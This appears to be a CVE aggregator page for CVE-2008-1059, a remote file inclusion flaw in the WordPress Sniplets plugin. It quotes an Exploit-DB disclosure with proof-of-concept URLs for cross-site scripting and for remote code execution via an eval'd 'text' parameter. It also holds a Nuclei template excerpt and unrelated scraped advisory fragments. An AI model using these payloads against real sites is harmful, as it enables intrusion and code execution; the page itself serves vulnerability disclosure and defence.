CVE-2008-1059
published 2008-02-28CVE-2008-1059: PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute…
PriorityP358high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
48.33%
98.7th percentile
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wordpress | sniplets_plugin | — | — |
| wordpress | sniplets_plugin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
exploitdb·2008-02-26
CVE-2008-1061 WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
WordPress Plugin Sniplets 1.1.2 - Remote File Inclusion / Cross-Site Scripting / Remote Code Execution
---
########################
Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities by NBBN
########################
1) Remote File Inclusion
File: /modules/syntax_highlight.php
Register Globals: ON
Vuln code:
"/>
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
3) Remote Code Execution
Register Globals: ON
Code:
'.$text;
eval ('?>'.$text);
?>
Poc:
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
# milw0rm.com [2008-02-26]
Nuclei
WordPress Sniplets 1.1.2 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2008-1059 [HIGH] WordPress Sniplets 1.1.2 - Local File Inclusion
WordPress Sniplets 1.1.2 - Local File Inclusion
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
Template:
id: CVE-2008-1059
info:
name: WordPress Sniplets 1.1.2 - Local File Inclusion
author: dhiyaneshDK
severity: high
description: |
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2009-1376 pidgin incomplete fix for CVE-2008-2927
bugzilla·2009-05-12·CVSS 6.8
CVE-2009-1376 [MEDIUM] CVE-2009-1376 pidgin incomplete fix for CVE-2008-2927
CVE-2009-1376 pidgin incomplete fix for CVE-2008-2927
The integer overflow fix for CVE-2008-2927 was incomplete on 32 bit
platforms. If a Pidgin user can receive a specially crafted MSN message,
it may be possible to execute arbitrary code with the permissions of the
user running Pidgin.
This flaw is only exploitable by individuals who can message a user, which
is controlled by the Pidgin privacy setting. The default setting is to
only allow messages from users in the buddy list.
Discussion:
Link to upstream advisory:
http://www.pidgin.im/news/security//?id=32
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 3
Via RHSA-2009:1059 https://rhn.redhat.com/errata/RHSA-2009-1059.html
---
This issue has been addressed in following products:
Red Hat Ent
http://secunia.com/advisories/29099http://securityreason.com/securityalert/3706http://www.securityfocus.com/archive/1/488734/100/0/threadedhttp://www.securityfocus.com/bid/27985https://exchange.xforce.ibmcloud.com/vulnerabilities/40829https://www.exploit-db.com/exploits/5194http://secunia.com/advisories/29099http://securityreason.com/securityalert/3706http://www.securityfocus.com/archive/1/488734/100/0/threadedhttp://www.securityfocus.com/bid/27985https://exchange.xforce.ibmcloud.com/vulnerabilities/40829https://www.exploit-db.com/exploits/5194
2008-02-28
Published